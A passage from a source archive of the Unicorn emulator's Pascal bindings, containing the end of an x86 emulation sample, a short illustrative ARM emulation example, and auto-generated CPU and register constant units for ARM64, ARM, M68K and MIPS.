Below is the CPU context'); uc_reg_read(uc, UC_X86_REG_RAX, @rax); WriteLn(Format('>>> RAX = 0x%x', [rax])); uc_close(uc); end; procedure TestX86_16; var uc: uc_engine; err: uc_err; tmp: Word; eax, ebx, esi: UInt32; begin eax := 7; ebx := 5; esi := 6; WriteLn('Emulate x86 16-bit code'); // Initialize emulator in X86-16bit mode err := uc_open(UC_ARCH_X86, UC_MODE_16, uc); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_open() with error returned: %u', [err])); Exit; end; // map 8KB memory for this emulation uc_mem_map(uc, 0, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write_(uc, 0, @X86_CODE16, SizeOf(X86_CODE16) - 1) <> UC_ERR_OK) then begin WriteLn('Failed to write emulation code to memory, quit!'); Exit; end; // initialize machine registers uc_reg_write(uc, UC_X86_REG_EAX, @eax); uc_reg_write(uc, UC_X86_REG_EBX, @ebx); uc_reg_write(uc, UC_X86_REG_ESI, @esi); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err := uc_emu_start(uc, 0, SizeOf(X86_CODE16) - 1, 0, 0); if (err <> UC_ERR_OK) then begin WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)])); end; // now print out some registers WriteLn('>>> Emulation done. Below is the CPU context'); tmp := 0; // only one byte is read below, so clear the whole Word first err := uc_mem_read_(uc, 11, @tmp, 1); if (err = UC_ERR_OK) then WriteLn(Format('>>> Read 1 byte from [0x%x] = 0x%x', [11, tmp])) else WriteLn(Format('>>> Failed to read 1 byte from [0x%x]', [11])); uc_close(uc); end; begin if ParamCount > 0 then begin if (ParamStr(1) = '-32') then begin TestI386; test_i386_map_ptr; test_i386_context_save; TestI386Inout; TestI386Jump; TestI386Loop; TestI386InvalidMemRead; TestI386InvalidMemWrite; TestI386JumpInvalid; end; if (ParamStr(1) = '-64') then begin TestX86_64; TestX86_64Syscall; end; if (ParamStr(1) = '-16') then begin TestX86_16; end; end else WriteLn(#10'Syntax: SampleX86 <-16|-32|-64>'#10); end. 
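For orientation before the architecture const units that follow: they plug into exactly the same Unicorn_dyn call sequence the x86 samples above use; only the architecture/mode constants and the register constants change. The sketch below is illustrative and not part of the original samples -- it assumes UC_ARCH_ARM and UC_MODE_ARM from UnicornConst, the UC_ARM_REG_* values from the ArmConst unit further below, and the machine-code bytes and load address are example values chosen for this demo.

// Illustrative sketch only (not shipped with the bindings): emulate two ARM
// instructions, "mov r0, #0x37; sub r1, r2, r3", with the same API as above.
procedure TestArmSketch;
const
  ADDR = $10000; // example load address for this demo
  // little-endian ARM encoding of "mov r0, #0x37; sub r1, r2, r3"
  ARM_CODE: array[0..7] of Byte = ($37, $00, $A0, $E3, $03, $10, $42, $E0);
var
  uc: uc_engine;
  err: uc_err;
  r0, r1, r2, r3: UInt32;
begin
  r0 := $1234; r1 := 0; r2 := $6789; r3 := $3333;
  err := uc_open(UC_ARCH_ARM, UC_MODE_ARM, uc);
  if (err <> UC_ERR_OK) then
  begin
    WriteLn(Format('Failed on uc_open() with error returned: %u', [err]));
    Exit;
  end;
  // map 2MB memory for this emulation
  uc_mem_map(uc, ADDR, 2 * 1024 * 1024, UC_PROT_ALL);
  // a byte array carries no trailing NUL, so no "- 1" is needed here
  if (uc_mem_write_(uc, ADDR, @ARM_CODE, SizeOf(ARM_CODE)) <> UC_ERR_OK) then
  begin
    WriteLn('Failed to write emulation code to memory, quit!');
    uc_close(uc);
    Exit;
  end;
  uc_reg_write(uc, UC_ARM_REG_R0, @r0);
  uc_reg_write(uc, UC_ARM_REG_R2, @r2);
  uc_reg_write(uc, UC_ARM_REG_R3, @r3);
  err := uc_emu_start(uc, ADDR, ADDR + SizeOf(ARM_CODE), 0, 0);
  if (err <> UC_ERR_OK) then
    WriteLn(Format('Failed on uc_emu_start() with error returned %u: %s', [err, uc_strerror(err)]));
  uc_reg_read(uc, UC_ARM_REG_R0, @r0);
  uc_reg_read(uc, UC_ARM_REG_R1, @r1);
  WriteLn(Format('>>> R0 = 0x%x', [r0])); // expected 0x37
  WriteLn(Format('>>> R1 = 0x%x', [r1])); // expected r2 - r3 = 0x3456
  uc_close(uc);
end;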
unicorn-2.1.1/bindings/pascal/examples/x86.lps
[Auto-generated Lazarus IDE session file (XML): open units, cursor positions, jump history, debugger watches. No hand-maintained content; omitted.]
unicorn-2.1.1/bindings/pascal/unicorn/
unicorn-2.1.1/bindings/pascal/unicorn/Arm64Const.pas
// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT unit Arm64Const; interface const // ARM64 CPU UC_CPU_ARM64_A57 = 0; UC_CPU_ARM64_A53 = 1; UC_CPU_ARM64_A72 = 2; UC_CPU_ARM64_MAX = 3; UC_CPU_ARM64_ENDING = 4; // ARM64 registers UC_ARM64_REG_INVALID = 0; UC_ARM64_REG_X29 = 1; UC_ARM64_REG_X30 = 2; UC_ARM64_REG_NZCV = 3; UC_ARM64_REG_SP = 4; UC_ARM64_REG_WSP = 5; UC_ARM64_REG_WZR = 6; UC_ARM64_REG_XZR = 7; UC_ARM64_REG_B0 = 8; UC_ARM64_REG_B1 = 9; UC_ARM64_REG_B2 = 10; UC_ARM64_REG_B3 = 11; UC_ARM64_REG_B4 = 12; UC_ARM64_REG_B5 = 13; UC_ARM64_REG_B6 = 14; UC_ARM64_REG_B7 = 15; UC_ARM64_REG_B8 = 16; UC_ARM64_REG_B9 = 17; UC_ARM64_REG_B10 = 18; UC_ARM64_REG_B11 = 19; UC_ARM64_REG_B12 = 20; UC_ARM64_REG_B13 = 21; UC_ARM64_REG_B14 = 22; UC_ARM64_REG_B15 = 23; UC_ARM64_REG_B16 = 24; UC_ARM64_REG_B17 = 25; UC_ARM64_REG_B18 = 26; UC_ARM64_REG_B19 = 27; UC_ARM64_REG_B20 = 28; UC_ARM64_REG_B21 = 29; UC_ARM64_REG_B22 = 30; UC_ARM64_REG_B23 = 31; UC_ARM64_REG_B24 = 32; UC_ARM64_REG_B25 = 33; UC_ARM64_REG_B26 = 34; UC_ARM64_REG_B27 = 35; UC_ARM64_REG_B28 = 36; UC_ARM64_REG_B29 = 37; UC_ARM64_REG_B30 = 38; UC_ARM64_REG_B31 = 39; UC_ARM64_REG_D0 = 40; UC_ARM64_REG_D1 = 41; UC_ARM64_REG_D2 = 42; UC_ARM64_REG_D3 = 43; UC_ARM64_REG_D4 = 44; UC_ARM64_REG_D5 = 45; UC_ARM64_REG_D6 = 46; UC_ARM64_REG_D7 = 47; UC_ARM64_REG_D8 = 48; UC_ARM64_REG_D9 = 49; UC_ARM64_REG_D10 = 50; UC_ARM64_REG_D11 = 51; UC_ARM64_REG_D12 = 52; UC_ARM64_REG_D13 = 53; UC_ARM64_REG_D14 = 54; UC_ARM64_REG_D15 = 55; UC_ARM64_REG_D16 = 56; UC_ARM64_REG_D17 = 57; UC_ARM64_REG_D18 = 58; UC_ARM64_REG_D19 = 59; UC_ARM64_REG_D20 = 60; UC_ARM64_REG_D21 = 61; UC_ARM64_REG_D22 = 62; UC_ARM64_REG_D23 = 63; UC_ARM64_REG_D24 = 64; UC_ARM64_REG_D25 = 65; UC_ARM64_REG_D26 = 66; UC_ARM64_REG_D27 = 67; UC_ARM64_REG_D28 = 68; UC_ARM64_REG_D29 = 69; UC_ARM64_REG_D30 = 70; UC_ARM64_REG_D31 = 71; UC_ARM64_REG_H0 = 72; UC_ARM64_REG_H1 = 73; UC_ARM64_REG_H2 = 74; UC_ARM64_REG_H3 = 75; UC_ARM64_REG_H4 = 76; UC_ARM64_REG_H5 = 77; UC_ARM64_REG_H6 = 78; UC_ARM64_REG_H7 = 79; UC_ARM64_REG_H8 = 80; UC_ARM64_REG_H9 = 81; UC_ARM64_REG_H10 = 82; UC_ARM64_REG_H11 = 83; UC_ARM64_REG_H12 = 84; UC_ARM64_REG_H13 = 85; UC_ARM64_REG_H14 = 86; UC_ARM64_REG_H15 = 87; UC_ARM64_REG_H16 = 88; UC_ARM64_REG_H17 = 89; UC_ARM64_REG_H18 = 90; UC_ARM64_REG_H19 = 91; UC_ARM64_REG_H20 = 92; UC_ARM64_REG_H21 = 93; UC_ARM64_REG_H22 = 94; UC_ARM64_REG_H23 = 95; UC_ARM64_REG_H24 = 96; UC_ARM64_REG_H25 = 97; UC_ARM64_REG_H26 = 98; UC_ARM64_REG_H27 = 99; UC_ARM64_REG_H28 = 100; UC_ARM64_REG_H29 = 101; UC_ARM64_REG_H30 = 102; UC_ARM64_REG_H31 = 103; UC_ARM64_REG_Q0 = 104; UC_ARM64_REG_Q1 = 105; UC_ARM64_REG_Q2 = 106; UC_ARM64_REG_Q3 = 107; UC_ARM64_REG_Q4 = 108; UC_ARM64_REG_Q5 = 109; UC_ARM64_REG_Q6 = 110; UC_ARM64_REG_Q7 = 111; UC_ARM64_REG_Q8 = 112; UC_ARM64_REG_Q9 = 113; UC_ARM64_REG_Q10 = 114; UC_ARM64_REG_Q11 = 115; UC_ARM64_REG_Q12 = 116; UC_ARM64_REG_Q13 = 117; UC_ARM64_REG_Q14 = 118; UC_ARM64_REG_Q15 = 119; UC_ARM64_REG_Q16 = 120; UC_ARM64_REG_Q17 = 121; UC_ARM64_REG_Q18 = 122; UC_ARM64_REG_Q19 = 123; UC_ARM64_REG_Q20 = 124; UC_ARM64_REG_Q21 = 125; UC_ARM64_REG_Q22 = 126; UC_ARM64_REG_Q23 = 127; UC_ARM64_REG_Q24 = 128; UC_ARM64_REG_Q25 = 129; UC_ARM64_REG_Q26 = 130; UC_ARM64_REG_Q27 = 131; UC_ARM64_REG_Q28 = 132; UC_ARM64_REG_Q29 = 133; UC_ARM64_REG_Q30 = 134; UC_ARM64_REG_Q31 = 135; UC_ARM64_REG_S0 = 136; UC_ARM64_REG_S1 = 137; UC_ARM64_REG_S2 = 138; UC_ARM64_REG_S3 = 139; UC_ARM64_REG_S4 = 140; UC_ARM64_REG_S5 = 141; UC_ARM64_REG_S6 = 142; UC_ARM64_REG_S7 = 143; UC_ARM64_REG_S8 = 144; UC_ARM64_REG_S9 = 
145; UC_ARM64_REG_S10 = 146; UC_ARM64_REG_S11 = 147; UC_ARM64_REG_S12 = 148; UC_ARM64_REG_S13 = 149; UC_ARM64_REG_S14 = 150; UC_ARM64_REG_S15 = 151; UC_ARM64_REG_S16 = 152; UC_ARM64_REG_S17 = 153; UC_ARM64_REG_S18 = 154; UC_ARM64_REG_S19 = 155; UC_ARM64_REG_S20 = 156; UC_ARM64_REG_S21 = 157; UC_ARM64_REG_S22 = 158; UC_ARM64_REG_S23 = 159; UC_ARM64_REG_S24 = 160; UC_ARM64_REG_S25 = 161; UC_ARM64_REG_S26 = 162; UC_ARM64_REG_S27 = 163; UC_ARM64_REG_S28 = 164; UC_ARM64_REG_S29 = 165; UC_ARM64_REG_S30 = 166; UC_ARM64_REG_S31 = 167; UC_ARM64_REG_W0 = 168; UC_ARM64_REG_W1 = 169; UC_ARM64_REG_W2 = 170; UC_ARM64_REG_W3 = 171; UC_ARM64_REG_W4 = 172; UC_ARM64_REG_W5 = 173; UC_ARM64_REG_W6 = 174; UC_ARM64_REG_W7 = 175; UC_ARM64_REG_W8 = 176; UC_ARM64_REG_W9 = 177; UC_ARM64_REG_W10 = 178; UC_ARM64_REG_W11 = 179; UC_ARM64_REG_W12 = 180; UC_ARM64_REG_W13 = 181; UC_ARM64_REG_W14 = 182; UC_ARM64_REG_W15 = 183; UC_ARM64_REG_W16 = 184; UC_ARM64_REG_W17 = 185; UC_ARM64_REG_W18 = 186; UC_ARM64_REG_W19 = 187; UC_ARM64_REG_W20 = 188; UC_ARM64_REG_W21 = 189; UC_ARM64_REG_W22 = 190; UC_ARM64_REG_W23 = 191; UC_ARM64_REG_W24 = 192; UC_ARM64_REG_W25 = 193; UC_ARM64_REG_W26 = 194; UC_ARM64_REG_W27 = 195; UC_ARM64_REG_W28 = 196; UC_ARM64_REG_W29 = 197; UC_ARM64_REG_W30 = 198; UC_ARM64_REG_X0 = 199; UC_ARM64_REG_X1 = 200; UC_ARM64_REG_X2 = 201; UC_ARM64_REG_X3 = 202; UC_ARM64_REG_X4 = 203; UC_ARM64_REG_X5 = 204; UC_ARM64_REG_X6 = 205; UC_ARM64_REG_X7 = 206; UC_ARM64_REG_X8 = 207; UC_ARM64_REG_X9 = 208; UC_ARM64_REG_X10 = 209; UC_ARM64_REG_X11 = 210; UC_ARM64_REG_X12 = 211; UC_ARM64_REG_X13 = 212; UC_ARM64_REG_X14 = 213; UC_ARM64_REG_X15 = 214; UC_ARM64_REG_X16 = 215; UC_ARM64_REG_X17 = 216; UC_ARM64_REG_X18 = 217; UC_ARM64_REG_X19 = 218; UC_ARM64_REG_X20 = 219; UC_ARM64_REG_X21 = 220; UC_ARM64_REG_X22 = 221; UC_ARM64_REG_X23 = 222; UC_ARM64_REG_X24 = 223; UC_ARM64_REG_X25 = 224; UC_ARM64_REG_X26 = 225; UC_ARM64_REG_X27 = 226; UC_ARM64_REG_X28 = 227; UC_ARM64_REG_V0 = 228; UC_ARM64_REG_V1 = 229; UC_ARM64_REG_V2 = 230; UC_ARM64_REG_V3 = 231; UC_ARM64_REG_V4 = 232; UC_ARM64_REG_V5 = 233; UC_ARM64_REG_V6 = 234; UC_ARM64_REG_V7 = 235; UC_ARM64_REG_V8 = 236; UC_ARM64_REG_V9 = 237; UC_ARM64_REG_V10 = 238; UC_ARM64_REG_V11 = 239; UC_ARM64_REG_V12 = 240; UC_ARM64_REG_V13 = 241; UC_ARM64_REG_V14 = 242; UC_ARM64_REG_V15 = 243; UC_ARM64_REG_V16 = 244; UC_ARM64_REG_V17 = 245; UC_ARM64_REG_V18 = 246; UC_ARM64_REG_V19 = 247; UC_ARM64_REG_V20 = 248; UC_ARM64_REG_V21 = 249; UC_ARM64_REG_V22 = 250; UC_ARM64_REG_V23 = 251; UC_ARM64_REG_V24 = 252; UC_ARM64_REG_V25 = 253; UC_ARM64_REG_V26 = 254; UC_ARM64_REG_V27 = 255; UC_ARM64_REG_V28 = 256; UC_ARM64_REG_V29 = 257; UC_ARM64_REG_V30 = 258; UC_ARM64_REG_V31 = 259; // pseudo registers UC_ARM64_REG_PC = 260; UC_ARM64_REG_CPACR_EL1 = 261; // thread registers, deprecated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TPIDR_EL0 = 262; UC_ARM64_REG_TPIDRRO_EL0 = 263; UC_ARM64_REG_TPIDR_EL1 = 264; UC_ARM64_REG_PSTATE = 265; // exception link registers, deprecated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_ELR_EL0 = 266; UC_ARM64_REG_ELR_EL1 = 267; UC_ARM64_REG_ELR_EL2 = 268; UC_ARM64_REG_ELR_EL3 = 269; // stack pointer registers, deprecated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_SP_EL0 = 270; UC_ARM64_REG_SP_EL1 = 271; UC_ARM64_REG_SP_EL2 = 272; UC_ARM64_REG_SP_EL3 = 273; // other CP15 registers, deprecated, use UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TTBR0_EL1 = 274; UC_ARM64_REG_TTBR1_EL1 = 275; UC_ARM64_REG_ESR_EL0 = 276; UC_ARM64_REG_ESR_EL1 = 277; UC_ARM64_REG_ESR_EL2 = 278; 
UC_ARM64_REG_ESR_EL3 = 279; UC_ARM64_REG_FAR_EL0 = 280; UC_ARM64_REG_FAR_EL1 = 281; UC_ARM64_REG_FAR_EL2 = 282; UC_ARM64_REG_FAR_EL3 = 283; UC_ARM64_REG_PAR_EL1 = 284; UC_ARM64_REG_MAIR_EL1 = 285; UC_ARM64_REG_VBAR_EL0 = 286; UC_ARM64_REG_VBAR_EL1 = 287; UC_ARM64_REG_VBAR_EL2 = 288; UC_ARM64_REG_VBAR_EL3 = 289; UC_ARM64_REG_CP_REG = 290; // floating point control and status registers UC_ARM64_REG_FPCR = 291; UC_ARM64_REG_FPSR = 292; UC_ARM64_REG_ENDING = 293; // alias registers UC_ARM64_REG_IP0 = 215; UC_ARM64_REG_IP1 = 216; UC_ARM64_REG_FP = 1; UC_ARM64_REG_LR = 2; // ARM64 instructions UC_ARM64_INS_INVALID = 0; UC_ARM64_INS_MRS = 1; UC_ARM64_INS_MSR = 2; UC_ARM64_INS_SYS = 3; UC_ARM64_INS_SYSL = 4; UC_ARM64_INS_ENDING = 5; implementation end.��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/ArmConst.pas��������������������������������������������������0000664�0000000�0000000�00000011065�14675241067�0022157�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit ArmConst; interface const // ARM CPU UC_CPU_ARM_926 = 0; UC_CPU_ARM_946 = 1; UC_CPU_ARM_1026 = 2; UC_CPU_ARM_1136_R2 = 3; UC_CPU_ARM_1136 = 4; UC_CPU_ARM_1176 = 5; UC_CPU_ARM_11MPCORE = 6; UC_CPU_ARM_CORTEX_M0 = 7; UC_CPU_ARM_CORTEX_M3 = 8; UC_CPU_ARM_CORTEX_M4 = 9; UC_CPU_ARM_CORTEX_M7 = 10; UC_CPU_ARM_CORTEX_M33 = 11; UC_CPU_ARM_CORTEX_R5 = 12; UC_CPU_ARM_CORTEX_R5F = 13; UC_CPU_ARM_CORTEX_A7 = 14; UC_CPU_ARM_CORTEX_A8 = 15; UC_CPU_ARM_CORTEX_A9 = 16; UC_CPU_ARM_CORTEX_A15 = 17; UC_CPU_ARM_TI925T = 18; UC_CPU_ARM_SA1100 = 19; UC_CPU_ARM_SA1110 = 20; UC_CPU_ARM_PXA250 = 21; UC_CPU_ARM_PXA255 = 22; UC_CPU_ARM_PXA260 = 23; UC_CPU_ARM_PXA261 = 24; UC_CPU_ARM_PXA262 = 25; UC_CPU_ARM_PXA270 = 26; UC_CPU_ARM_PXA270A0 = 27; UC_CPU_ARM_PXA270A1 = 28; UC_CPU_ARM_PXA270B0 = 29; UC_CPU_ARM_PXA270B1 = 30; UC_CPU_ARM_PXA270C0 = 31; UC_CPU_ARM_PXA270C5 = 32; UC_CPU_ARM_MAX = 33; UC_CPU_ARM_ENDING = 34; // ARM registers UC_ARM_REG_INVALID = 0; UC_ARM_REG_APSR = 1; UC_ARM_REG_APSR_NZCV = 2; UC_ARM_REG_CPSR = 3; UC_ARM_REG_FPEXC = 4; UC_ARM_REG_FPINST = 5; UC_ARM_REG_FPSCR = 6; UC_ARM_REG_FPSCR_NZCV = 7; UC_ARM_REG_FPSID = 8; UC_ARM_REG_ITSTATE = 9; UC_ARM_REG_LR = 10; UC_ARM_REG_PC = 11; UC_ARM_REG_SP = 12; UC_ARM_REG_SPSR = 13; UC_ARM_REG_D0 = 14; UC_ARM_REG_D1 = 15; UC_ARM_REG_D2 = 16; UC_ARM_REG_D3 = 17; UC_ARM_REG_D4 = 18; UC_ARM_REG_D5 = 19; UC_ARM_REG_D6 = 20; UC_ARM_REG_D7 = 21; UC_ARM_REG_D8 = 22; UC_ARM_REG_D9 = 23; UC_ARM_REG_D10 = 24; UC_ARM_REG_D11 = 25; UC_ARM_REG_D12 = 26; UC_ARM_REG_D13 = 27; UC_ARM_REG_D14 = 28; UC_ARM_REG_D15 = 29; UC_ARM_REG_D16 = 30; UC_ARM_REG_D17 = 31; UC_ARM_REG_D18 = 32; UC_ARM_REG_D19 = 33; UC_ARM_REG_D20 = 34; UC_ARM_REG_D21 = 35; UC_ARM_REG_D22 = 36; UC_ARM_REG_D23 = 37; UC_ARM_REG_D24 = 38; UC_ARM_REG_D25 = 39; UC_ARM_REG_D26 = 40; UC_ARM_REG_D27 = 41; UC_ARM_REG_D28 = 42; UC_ARM_REG_D29 = 43; UC_ARM_REG_D30 = 44; UC_ARM_REG_D31 = 45; UC_ARM_REG_FPINST2 = 46; UC_ARM_REG_MVFR0 = 47; UC_ARM_REG_MVFR1 = 48; UC_ARM_REG_MVFR2 = 49; UC_ARM_REG_Q0 = 50; UC_ARM_REG_Q1 = 51; 
UC_ARM_REG_Q2 = 52; UC_ARM_REG_Q3 = 53; UC_ARM_REG_Q4 = 54; UC_ARM_REG_Q5 = 55; UC_ARM_REG_Q6 = 56; UC_ARM_REG_Q7 = 57; UC_ARM_REG_Q8 = 58; UC_ARM_REG_Q9 = 59; UC_ARM_REG_Q10 = 60; UC_ARM_REG_Q11 = 61; UC_ARM_REG_Q12 = 62; UC_ARM_REG_Q13 = 63; UC_ARM_REG_Q14 = 64; UC_ARM_REG_Q15 = 65; UC_ARM_REG_R0 = 66; UC_ARM_REG_R1 = 67; UC_ARM_REG_R2 = 68; UC_ARM_REG_R3 = 69; UC_ARM_REG_R4 = 70; UC_ARM_REG_R5 = 71; UC_ARM_REG_R6 = 72; UC_ARM_REG_R7 = 73; UC_ARM_REG_R8 = 74; UC_ARM_REG_R9 = 75; UC_ARM_REG_R10 = 76; UC_ARM_REG_R11 = 77; UC_ARM_REG_R12 = 78; UC_ARM_REG_S0 = 79; UC_ARM_REG_S1 = 80; UC_ARM_REG_S2 = 81; UC_ARM_REG_S3 = 82; UC_ARM_REG_S4 = 83; UC_ARM_REG_S5 = 84; UC_ARM_REG_S6 = 85; UC_ARM_REG_S7 = 86; UC_ARM_REG_S8 = 87; UC_ARM_REG_S9 = 88; UC_ARM_REG_S10 = 89; UC_ARM_REG_S11 = 90; UC_ARM_REG_S12 = 91; UC_ARM_REG_S13 = 92; UC_ARM_REG_S14 = 93; UC_ARM_REG_S15 = 94; UC_ARM_REG_S16 = 95; UC_ARM_REG_S17 = 96; UC_ARM_REG_S18 = 97; UC_ARM_REG_S19 = 98; UC_ARM_REG_S20 = 99; UC_ARM_REG_S21 = 100; UC_ARM_REG_S22 = 101; UC_ARM_REG_S23 = 102; UC_ARM_REG_S24 = 103; UC_ARM_REG_S25 = 104; UC_ARM_REG_S26 = 105; UC_ARM_REG_S27 = 106; UC_ARM_REG_S28 = 107; UC_ARM_REG_S29 = 108; UC_ARM_REG_S30 = 109; UC_ARM_REG_S31 = 110; UC_ARM_REG_C1_C0_2 = 111; UC_ARM_REG_C13_C0_2 = 112; UC_ARM_REG_C13_C0_3 = 113; UC_ARM_REG_IPSR = 114; UC_ARM_REG_MSP = 115; UC_ARM_REG_PSP = 116; UC_ARM_REG_CONTROL = 117; UC_ARM_REG_IAPSR = 118; UC_ARM_REG_EAPSR = 119; UC_ARM_REG_XPSR = 120; UC_ARM_REG_EPSR = 121; UC_ARM_REG_IEPSR = 122; UC_ARM_REG_PRIMASK = 123; UC_ARM_REG_BASEPRI = 124; UC_ARM_REG_BASEPRI_MAX = 125; UC_ARM_REG_FAULTMASK = 126; UC_ARM_REG_APSR_NZCVQ = 127; UC_ARM_REG_APSR_G = 128; UC_ARM_REG_APSR_NZCVQG = 129; UC_ARM_REG_IAPSR_NZCVQ = 130; UC_ARM_REG_IAPSR_G = 131; UC_ARM_REG_IAPSR_NZCVQG = 132; UC_ARM_REG_EAPSR_NZCVQ = 133; UC_ARM_REG_EAPSR_G = 134; UC_ARM_REG_EAPSR_NZCVQG = 135; UC_ARM_REG_XPSR_NZCVQ = 136; UC_ARM_REG_XPSR_G = 137; UC_ARM_REG_XPSR_NZCVQG = 138; UC_ARM_REG_CP_REG = 139; UC_ARM_REG_ENDING = 140; // alias registers UC_ARM_REG_R13 = 12; UC_ARM_REG_R14 = 10; UC_ARM_REG_R15 = 11; UC_ARM_REG_SB = 75; UC_ARM_REG_SL = 76; UC_ARM_REG_FP = 77; UC_ARM_REG_IP = 78; implementation end.���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/M68kConst.pas�������������������������������������������������0000664�0000000�0000000�00000001531�14675241067�0022162�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT unit M68kConst; interface const // M68K CPU UC_CPU_M68K_M5206 = 0; UC_CPU_M68K_M68000 = 1; UC_CPU_M68K_M68020 = 2; UC_CPU_M68K_M68030 = 3; UC_CPU_M68K_M68040 = 4; UC_CPU_M68K_M68060 = 5; UC_CPU_M68K_M5208 = 6; UC_CPU_M68K_CFV4E = 7; UC_CPU_M68K_ANY = 8; UC_CPU_M68K_ENDING = 9; // M68K registers UC_M68K_REG_INVALID = 0; UC_M68K_REG_A0 = 1; UC_M68K_REG_A1 = 2; UC_M68K_REG_A2 = 3; UC_M68K_REG_A3 = 4; UC_M68K_REG_A4 = 5; UC_M68K_REG_A5 = 6; UC_M68K_REG_A6 = 7; UC_M68K_REG_A7 = 8; UC_M68K_REG_D0 = 9; UC_M68K_REG_D1 = 10; UC_M68K_REG_D2 = 11; UC_M68K_REG_D3 = 12; UC_M68K_REG_D4 = 13; UC_M68K_REG_D5 = 14; UC_M68K_REG_D6 = 15; UC_M68K_REG_D7 = 16; UC_M68K_REG_SR = 17; UC_M68K_REG_PC = 18; UC_M68K_REG_ENDING = 19; implementation end.�����������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/MipsConst.pas�������������������������������������������������0000664�0000000�0000000�00000012675�14675241067�0022360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit MipsConst; interface const // MIPS32 CPUS UC_CPU_MIPS32_4KC = 0; UC_CPU_MIPS32_4KM = 1; UC_CPU_MIPS32_4KECR1 = 2; UC_CPU_MIPS32_4KEMR1 = 3; UC_CPU_MIPS32_4KEC = 4; UC_CPU_MIPS32_4KEM = 5; UC_CPU_MIPS32_24KC = 6; UC_CPU_MIPS32_24KEC = 7; UC_CPU_MIPS32_24KF = 8; UC_CPU_MIPS32_34KF = 9; UC_CPU_MIPS32_74KF = 10; UC_CPU_MIPS32_M14K = 11; UC_CPU_MIPS32_M14KC = 12; UC_CPU_MIPS32_P5600 = 13; UC_CPU_MIPS32_MIPS32R6_GENERIC = 14; UC_CPU_MIPS32_I7200 = 15; UC_CPU_MIPS32_ENDING = 16; // MIPS64 CPUS UC_CPU_MIPS64_R4000 = 0; UC_CPU_MIPS64_VR5432 = 1; UC_CPU_MIPS64_5KC = 2; UC_CPU_MIPS64_5KF = 3; UC_CPU_MIPS64_20KC = 4; UC_CPU_MIPS64_MIPS64R2_GENERIC = 5; UC_CPU_MIPS64_5KEC = 6; UC_CPU_MIPS64_5KEF = 7; UC_CPU_MIPS64_I6400 = 8; UC_CPU_MIPS64_I6500 = 9; UC_CPU_MIPS64_LOONGSON_2E = 10; UC_CPU_MIPS64_LOONGSON_2F = 11; UC_CPU_MIPS64_MIPS64DSPR2 = 12; UC_CPU_MIPS64_ENDING = 13; // MIPS registers UC_MIPS_REG_INVALID = 0; // General purpose registers UC_MIPS_REG_PC = 1; UC_MIPS_REG_0 = 2; UC_MIPS_REG_1 = 3; UC_MIPS_REG_2 = 4; UC_MIPS_REG_3 = 5; UC_MIPS_REG_4 = 6; UC_MIPS_REG_5 = 7; UC_MIPS_REG_6 = 8; UC_MIPS_REG_7 = 9; UC_MIPS_REG_8 = 10; UC_MIPS_REG_9 = 11; UC_MIPS_REG_10 = 12; UC_MIPS_REG_11 = 13; UC_MIPS_REG_12 = 14; UC_MIPS_REG_13 = 15; UC_MIPS_REG_14 = 16; UC_MIPS_REG_15 = 17; UC_MIPS_REG_16 = 18; UC_MIPS_REG_17 = 19; UC_MIPS_REG_18 = 20; UC_MIPS_REG_19 = 21; UC_MIPS_REG_20 = 22; UC_MIPS_REG_21 = 23; UC_MIPS_REG_22 = 24; UC_MIPS_REG_23 = 25; UC_MIPS_REG_24 = 26; UC_MIPS_REG_25 = 27; UC_MIPS_REG_26 = 28; UC_MIPS_REG_27 = 29; UC_MIPS_REG_28 = 30; UC_MIPS_REG_29 = 31; UC_MIPS_REG_30 = 32; UC_MIPS_REG_31 = 33; // DSP registers UC_MIPS_REG_DSPCCOND = 34; UC_MIPS_REG_DSPCARRY = 35; UC_MIPS_REG_DSPEFI = 36; UC_MIPS_REG_DSPOUTFLAG = 37; UC_MIPS_REG_DSPOUTFLAG16_19 = 38; UC_MIPS_REG_DSPOUTFLAG20 = 39; UC_MIPS_REG_DSPOUTFLAG21 = 40; UC_MIPS_REG_DSPOUTFLAG22 = 41; UC_MIPS_REG_DSPOUTFLAG23 = 42; UC_MIPS_REG_DSPPOS = 43; UC_MIPS_REG_DSPSCOUNT = 44; // ACC registers UC_MIPS_REG_AC0 = 45; UC_MIPS_REG_AC1 = 46; UC_MIPS_REG_AC2 = 47; 
